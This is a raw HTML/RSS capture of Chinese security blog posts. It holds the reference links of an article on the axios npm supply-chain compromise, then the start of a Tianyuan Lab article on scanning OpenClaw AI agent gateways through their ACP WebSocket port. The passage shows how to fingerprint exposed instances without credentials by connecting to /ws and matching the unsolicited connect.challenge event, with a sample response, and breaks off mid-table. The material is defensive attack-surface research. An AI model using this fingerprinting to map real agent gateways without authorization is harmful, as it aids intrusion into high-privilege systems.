!important;overflow-wrap: break-word !important;font-size: 14.4px;line-height: 1.75;"><span leaf=""><a href="https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan" target="_blank">https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan</a></span></i></span></p><p mp-original-font-size="14.4" mp-original-line-height="1.7500000694444444" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;display: flex;font-size: 14.4px;line-height: 1.75;"><span mp-original-font-size="14.4" mp-original-line-height="1.7500000694444444" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: inline;width: 67.690216px;font-size: 14.4px;line-height: 1.75;"><span leaf="">[4]</span></span><span mp-original-font-size="14.4" mp-original-line-height="1.7500000694444444" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word;display: inline;width: 609.293518px;word-break: break-all;font-size: 14.4px;line-height: 1.75;"><span leaf="">GitHub - axios/axios Issue <a class="wx_topic_link" topic-id="mneafpjk-adwuws" style="color: #576B95 !important;" data-topic="1" data-recommend="">#10604</a>:</span><i mp-original-font-size="14.4" mp-original-line-height="1.7500000694444444" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 14.4px;line-height: 1.75;"><span leaf=""><a href="https://github.com/axios/axios/issues/10604" target="_blank">https://github.com/axios/axios/issues/10604</a></span></i></span></p><p mp-original-font-size="14.4" mp-original-line-height="1.7500000694444444" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;display: flex;font-size: 14.4px;line-height: 1.75;"><span mp-original-font-size="14.4" mp-original-line-height="1.7500000694444444" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: inline;width: 67.690216px;font-size: 14.4px;line-height: 1.75;"><span leaf="">[5]</span></span><span mp-original-font-size="14.4" mp-original-line-height="1.7500000694444444" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word;display: inline;width: 609.293518px;word-break: break-all;font-size: 14.4px;line-height: 1.75;"><span leaf="">Aikido Security - axios compromised on npm:</span><i mp-original-font-size="14.4" mp-original-line-height="1.7500000694444444" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 14.4px;line-height: 1.75;"><span leaf=""><a href="https://www.aikido.dev/blog/axios-npm-compromised-maintainer-hijacked-rat" target="_blank">https://www.aikido.dev/blog/axios-npm-compromised-maintainer-hijacked-rat</a></span></i></span></p><p mp-original-font-size="14.4" mp-original-line-height="1.7500000694444444" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;display: flex;font-size: 14.4px;line-height: 1.75;"><span mp-original-font-size="14.4" mp-original-line-height="1.7500000694444444" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: inline;width: 67.690216px;font-size: 14.4px;line-height: 1.75;"><span leaf="">[6]</span></span><span mp-original-font-size="14.4" mp-original-line-height="1.7500000694444444" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word;display: inline;width: 609.293518px;word-break: break-all;font-size: 14.4px;line-height: 1.75;"><span leaf="">Socket.dev - Supply Chain Attack on Axios:</span><i mp-original-font-size="14.4" mp-original-line-height="1.7500000694444444" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 14.4px;line-height: 1.75;"><span leaf=""><a href="https://socket.dev/blog/axios-npm-package-compromised" target="_blank">https://socket.dev/blog/axios-npm-package-compromised</a></span></i></span></p><p mp-original-font-size="14.4" mp-original-line-height="1.7500000694444444" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;display: flex;font-size: 14.4px;line-height: 1.75;"><span mp-original-font-size="14.4" mp-original-line-height="1.7500000694444444" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: inline;width: 67.690216px;font-size: 14.4px;line-height: 1.75;"><span leaf="">[7]</span></span><span mp-original-font-size="14.4" mp-original-line-height="1.7500000694444444" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word;display: inline;width: 609.293518px;word-break: break-all;font-size: 14.4px;line-height: 1.75;"><span leaf="">VibeAudits - Axios npm Supply Chain Attack:</span><i mp-original-font-size="14.4" mp-original-line-height="1.7500000694444444" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 14.4px;line-height: 1.75;"><span leaf=""><a href="https://vibeaudits.com/blog/axios-npm-supply-chain-attack-31-march-26-what-happened-whos-affected" target="_blank">https://vibeaudits.com/blog/axios-npm-supply-chain-attack-31-march-26-what-happened-whos-affected</a></span></i></span></p></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=4d4abb88&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzkyMTI0NjA3OA%3D%3D%26mid%3D2247494899%26idx%3D1%26sn%3D0030596542ccc940303101d3f850e2a6">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 31 Mar 2026 18:00:00 +0800</pubDate>
    </item>
    <item>
      <title>从 ACP 协议看 OpenClaw 的暴露面探测</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494878&amp;idx=1&amp;sn=6b55e606fbcfc30f1d3f0022d7e3b6b6</link>
      <description>从架构到风险，从实测到趋势研判，全链路揭SKILLS繁荣下的安全危机  想摸清SKILLS哪里不安全？哪些攻击面实锤利用？这篇就够！</description>
      <content:encoded><![CDATA[<p>原创 <span>天元实验室</span> <span>2026-03-30 18:01</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=9d1f1599&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FuZT6kWW1jCmq0gfqOTXTBca02WwDck3QOyqcIfLUFfibWyX6H6icPJB10ibgvicIbecPF51TMMj2P5PGrNssHLyQ9Yb0xhf8Md6WJiaVmgfib1T6c%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>从架构到风险，从实测到趋势研判，全链路揭SKILLS繁荣下的安全危机  想摸清SKILLS哪里不安全？哪些攻击面实锤利用？这篇就够！</p>
  <div style="box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="display: flex;flex-flow: row;margin: 7px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;width: 20px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;background-color: rgb(67, 146, 117);box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011218" src="https://wechat2rss.xlab.app/img-proxy/?k=3a15840d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FuZT6kWW1jCnOnSeI2la4e8lCOia2YxnAgzmjBb5X2hz9HgBjtgbumP7eTqU4lpibcQ3XjtaILiaicKsy2xmTyfAoIrpvnzg5Gzlrsm7eGicKGMaQ%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="font-size: 20px;line-height: 1;letter-spacing: 1px;padding: 0px 8px;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">引言</span></b></p></div></div></div><div style="display: flex;flex-flow: row;margin: 0px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 3px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;flex: 100 100 0%;align-self: flex-start;height: auto;border-bottom: 3px solid rgb(67, 146, 117);border-bottom-right-radius: 0px;padding: 0px 10px 10px 20px;box-sizing: border-box;"><div style="color: rgb(106, 106, 106);line-height: 1.8;letter-spacing: 1px;padding: 0px;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2026 年，AI Agent 正以前所未有的速度从&#34;对话玩具&#34;演变为企业的核心基础设施。它们不再只是接收 prompt 返回文本的 LLM wrapper，而是长出了读写文件系统、执行终端命令、调用内部 API、管理密钥和设备配对的能力。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">当这类高权限的 AI 基础设施开始规模化部署时，安全团队面临一个根本性的范式转换：</span><strong style="box-sizing: border-box;"><span leaf="">目标不再是 Web 应用或数据库，而是一个能够自主决策、拥有极高控制面价值的智能编排网关。</span></strong></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">本文聚焦一个极具代表性的具体产品——</span><strong style="box-sizing: border-box;"><span leaf="">OpenClaw</span></strong><span leaf="">，从它的心脏</span><strong style="box-sizing: border-box;"><span leaf="">ACP（Agent Client Protocol）端口</span></strong><span leaf="">入手，系统性地展示如何在未授权条件下利用协议语义特征进行精准暴露面测绘，并在授权条件下验证内部编排机制的真实行为。</span></p></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">01 什么是 ACP？OpenClaw 又是如何“魔改”它的？</span></span></strong></p></div></div></div></div><div style="box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">ACP（Agent Client Protocol）</span></strong><span leaf="">是 Zed Industries 提出的一种标准化协议，主要用于 AI Agent 与代码编辑环境的通信。设计初衷很简单：为 IDE（如 VS Code）与本地 Agent 进程（如 Claude Code）之间提供一个统一的 JSON-RPC 通信格式。可以把 ACP 理解为&#34;AI Agent 的 HTTP&#34;——它定义了消息怎么发、会话怎么管、工具调用怎么走。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">在传统的标准范式中，ACP 主要是为了“IDE 与本地 Agent 进程”单向通信而设计的。但 OpenClaw 的野心不止于此，它对 ACP 进行了深度的“魔改”与扩充。其设计目标远超&#34;IDE ↔ 本地 Agent&#34;的范畴。它将 ACP 扩展为一个多 Agent 编排网关，并在其上构建了完整的设备管理、通道桥接和工具调度体系。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">在 OpenClaw 的架构中，ACP 呈现出几个非常关键的特殊性：</span></p></div><ol style="list-style-type: decimal;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-1"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">双层桥接架构（Bridge &amp; Gateway）：OpenClaw 表面上通过 ACP 接收客户端请求，但内部实际上会将请求翻译并转发到自己的 Gateway，再由 Gateway 去调度真正的模型或工具。</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">多 Agent 调度（Multi-Harness）：OpenClaw 可以同时挂载多个 Agent，并利用 ACP 反向调用外部 Agent 进行工作流接力。</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">会话的持久化与线程绑定：传统 ACP 断开即丢失，而 OpenClaw 的 ACP 会话可以持久化存储，并且能与 Discord、Telegram 等外部通道的频道/用户进行线程绑定。</span></p></li></ol><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">同时，OpenClaw 在 WebSocket 连接之上叠加了多因子认证：Gateway Token、设备签名（Ed25519）、Bootstrap Token、Tailscale 身份等，形成了严格的零信任接入策略。简而言之：在 OpenClaw 的语境下，ACP 已经从一个本地开发协议，升级为进入整个多 Agent 编排体系的&#34;远程控制总线&#34;。</span></p><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.6174402250351617" data-s="300,640" data-type="png" data-w="711" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011220" src="https://wechat2rss.xlab.app/img-proxy/?k=1bd1b470&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FuZT6kWW1jCmcty01qb2h12Jrsia1Atw5iag8DMSEBun4DI7lgTj1gGKSoFwRVnqdiaBmhKq2f6s9LBYrFKFcxmh37iaVvVx23kzyeWRCdiaDLTnY%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">02 </span></span><span leaf="">未授权暴露面探测：四层协议指纹</span></strong></p></div></div></div></div><div style="box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">传统的资产测绘依赖端口扫描和 HTTP 响应中的特征字符串（如匹配 </span><span style="background-color: rgba(255, 255, 255, 0);box-sizing: border-box;"><span leaf="">openclaw </span></span><span leaf="">关键字）。这种方法的局限性很明显：修改默认端口、套反向代理、换自定义路径就能让扫描器&#34;变瞎&#34;。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">我们的思路是从字符串匹配升级为</span><strong style="box-sizing: border-box;"><span leaf="">协议语义探测</span></strong><span leaf="">——利用 WebSocket 协议本身的行为特征来识别目标。</span></p></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">⚠️ </span><strong style="box-sizing: border-box;"><span style="color: rgb(62, 62, 62);box-sizing: border-box;"><span leaf="">认证要求说明：</span></span></strong></p></div></div><div style="text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">指纹 1、2、4：</span><strong style="box-sizing: border-box;"><span leaf="">完全无需认证</span></strong><span leaf="">✅</span></p></div><div style="text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">指纹 3：</span><strong style="box-sizing: border-box;"><span leaf="">需要认证后才能进行</span></strong><span leaf="">⚠️</span></p></div></div></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;border-bottom: 1px solid rgb(67, 146, 117);border-bottom-right-radius: 0px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: justify;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;background-color: rgb(67, 146, 117);min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;padding: 9px;align-self: center;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);font-size: 18px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">指纹 1</span></strong></p></div></div><div style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;align-self: center;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;text-align: left;transform: translate3d(11px, 0px, 0px);-webkit-transform: translate3d(11px, 0px, 0px);-moz-transform: translate3d(11px, 0px, 0px);-o-transform: translate3d(11px, 0px, 0px);box-sizing: border-box;"><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">被动握手特征 — connect.challenge</span></strong></p></div></div></div></div></div></div><div style="min-height: 40px;margin: 10px 0%;box-sizing: border-box;"><p style="width: 100%;margin: 0px auto -10px;box-sizing: border-box;"><table style="border-collapse: collapse;box-sizing: border-box;margin-bottom: 10px;"><tbody><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">项目</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">内容</span></strong></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">认证要求</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">无需认证 ✅</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">探测方式</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">对目标发起 WebSocket 连接（默认路径 /ws），</span><strong style="box-sizing: border-box;"><span leaf="">什么都不用发</span></strong></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">指纹类型</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">被动指纹（服务端主动推送）</span></p></div></div></td></tr></tbody></table></p></div><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">响应示例：</span></strong></p></div><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="json"><code><span leaf=""><span class="code-snippet__punctuation">{</span></span></code><br/><code><span leaf="">  <span class="code-snippet__attr">&#34;type&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__string">&#34;event&#34;</span><span class="code-snippet__punctuation">,</span></span></code><br/><code><span leaf="">  <span class="code-snippet__attr">&#34;event&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__string">&#34;connect.challenge&#34;</span><span class="code-snippet__punctuation">,</span></span></code><br/><code><span leaf="">  <span class="code-snippet__attr">&#34;payload&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__punctuation">{</span></span></code><br/><code><span leaf="">    <span class="code-snippet__attr">&#34;nonce&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__string">&#34;550e8400-e29b-41d4-a716-446655440000&#34;</span><span class="code-snippet__punctuation">,</span></span></code><br/><code><span leaf="">    <span class="code-snippet__attr">&#34;ts&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__number">1774000000000</span></span></code><br/><code><span leaf="">  <span class="code-snippet__punctuation">}</span></span></code><br/><code><span leaf=""><span class="code-snippet__punctuation">}</span></span></code><br/></pre></p><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">特征要素：</span></strong></p></div><div style="min-height: 40px;margin: 10px 0%;box-sizing: border-box;"><p style="width: 100%;margin: 0px auto -10px;box-sizing: border-box;"><table style="border-collapse: collapse;box-sizing: border-box;margin-bottom: 10px;"><tbody><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">字段</span></strong></p></div></div></td><td data-colwidth="33.4100%" width="33.4100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">值/格式</span></strong></p></div></div></td><td data-colwidth="33.4100%" width="33.4100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="text-align: center;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">说明</span></strong></p></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">event</span></p></div></div></td><td data-colwidth="33.4100%" width="33.4100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">固定为 connect.challenge</span></p></div></div></td><td data-colwidth="33.4100%" width="33.4100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="text-align: center;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">事件类型标识</span></p></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">payload.nonce</span></p></div></div></td><td data-colwidth="33.4100%" width="33.4100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">UUID v4 格式</span></p></div></div></td><td data-colwidth="33.4100%" width="33.4100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="text-align: center;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">随机数，用于后续认证</span></p></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 